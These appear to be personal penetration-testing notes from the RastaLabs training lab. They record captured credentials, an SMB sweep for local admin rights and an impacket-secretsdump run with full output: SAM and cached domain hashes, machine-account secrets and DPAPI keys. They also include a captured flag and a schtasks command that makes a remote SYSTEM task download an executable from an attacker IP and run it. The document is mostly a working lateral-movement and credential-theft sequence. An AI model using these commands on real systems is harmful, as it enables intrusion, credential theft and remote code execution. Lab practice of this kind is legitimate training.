RastaLabs | Notion

RLAB\ahope —> Summer2023 (exchange password 10.10.110.254)

User I Have RLAB\bowen

Home --> \\\\fs01.rastalabs.local\\home$\\bowen
Username --> RLAB\\Bowen
Password --> NovakDjokovic001

Untitled

Discovering local admin access

nxc smb 10.10.120.0/24 -u 'bowen' -p 'NovakDjokovic001'

Untitled

local admin access on SRV01

Dumping Secrets From SRV01

impacket-secretsdump rlab/bowen:'NovakDjokovic001'@10.10.120.15

Untitled

┌──(rem01x㉿Rem01x)-[~/…/OSEP/CRTE/ProLabs/RastaLabs]
└─$ impacket-secretsdump rlab/bowen:'NovakDjokovic001'@10.10.120.15
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xc8f57878e04b2e206f4b4341a9ab53da
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:eb95d888c9605807f681a8095b86e659:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping cached domain logon information (domain/username:hash)
RASTALABS.LOCAL/rweston_da:$DCC2$10240#rweston_da#24c8e9ab0617120753dc6d5ea9262ea6: (2022-08-10 21:57:06)
RASTALABS.LOCAL/Administrator:$DCC2$10240#Administrator#4846fb364be3573b565cdf0b9d1798af: (2023-10-19 13:17:51)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
RLAB\\SRV01$:aes256-cts-hmac-sha1-96:3280d07501f13ab6f9261c65553fcc9e48f573e60aba507bba650ef5733e3539
RLAB\\SRV01$:aes128-cts-hmac-sha1-96:1b7a661c7f602c637a0cdeccfa2cd38b
RLAB\\SRV01$:des-cbc-md5:5740198661d6d007
RLAB\\SRV01$:plain_password_hex:4ae7568032778518d857e7d9ca623dfa7faed688dcd34697e3fcb64c6967ddabcefd8a9d84d9896051c0490b97ebdba9706456af5ed47df94cd47d77dc2a0d1728229153f97fcd4f60080190e37795b2acbbb9d42b3e5729035508e17f7ac7fb2528501f7600255e1fa92175750028f5aab27820f859c9ac7d287aeef4c2cba2eb299337179d6311938e73f0f17e1f58413499e173d2171d4789b70b40b38f0b5402bc0a2b71fa208ade03fdb8b96e6fcea6913df098ab49e5f05e6e52676eb532ee1f2f6977231af335d1b44e174c88681239b6baefa0df3bc162817c42973345d783a4ae8b1a8c5032c9b6e6feaa6e
RLAB\\SRV01$:aad3b435b51404eeaad3b435b51404ee:ff6b0335cc1a85d404129df294ce45ab:::
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x2d5f8e85b7c8cee12b7f5fc25dc1a046a1578121
dpapi_userkey:0xa1821ff66113ccb0a891c59d9ae303cf779c46b1
[*] NL$KM 
 0000   3D 3D E8 3C D1 46 2B 26  15 28 5F D7 F6 60 C4 2C   ==.<.F+&.(_..`.,
 0010   FC 31 A1 08 82 BD 8F 1B  C8 59 44 5C 20 DC AC 54   .1.......YD\\ ..T
 0020   54 DE 73 3A 14 1A 39 D3  9D 19 3D 83 1C E6 41 3D   T.s:..9...=...A=
 0030   2E B9 01 9F 68 75 53 A3  C5 75 B4 AC 54 8E 85 3A   ....huS..u..T..:
NL$KM:3d3de83cd1462b2615285fd7f660c42cfc31a10882bd8f1bc859445c20dcac5454de733a141a39d39d193d831ce6413d2eb9019f687553a3c575b4ac548e853a
[*] Cleaning up... 
[*] Stopping service RemoteRegistry

Got Bowen Flag from his home directory

copy \\\\fs01.rastalabs.local\\home$\\bowen\\Desktop\\flag.txt c:\\users\\bowen
RASTA{w007_f007h0ld_l375_pwn}

Untitled

test

schtasks /create /S srv01.rastalabs.local /SC Weekly /RU "NT Authority\\SYSTEM" /TN "STChecks" /TR "powershell.exe -c 'iwr -uri <http://10.10.17.43/lync.exe> -outfile c:\\\\windows\\\\temp\\\\lync.exe;c:\\\\windows\\\\temp\\\\lync.exe'"

schtasks /Run /S srv01.rastalabs.local /TN "STChecks"

Found ngodfrey user ASREP

Username --> RLAB\\Ngodfrey
Password --> zaq123$%^&*()_+